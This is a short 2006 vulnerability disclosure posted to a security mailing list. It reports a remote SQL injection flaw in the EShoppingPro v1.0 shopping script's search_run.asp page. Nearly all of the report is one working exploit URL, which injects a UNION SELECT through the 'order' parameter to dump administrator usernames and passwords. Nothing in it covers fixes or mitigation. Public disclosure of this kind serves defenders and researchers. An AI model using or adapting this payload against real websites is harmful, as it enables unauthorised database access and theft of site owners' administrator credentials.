EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability
Date: 17 Sep 2006 13:28:46 -0000
From: [email protected]
To: [email protected]
Subject: EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru
Vulnerability Report
*******************************************************************************
# Title : EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.keyvan1.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/search_run.asp?keyword=-1&category=-1&order='%20union%20select%200,0,0,Username,Password,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin&x=-1&y=-1
# ajann,Turkey
# ...
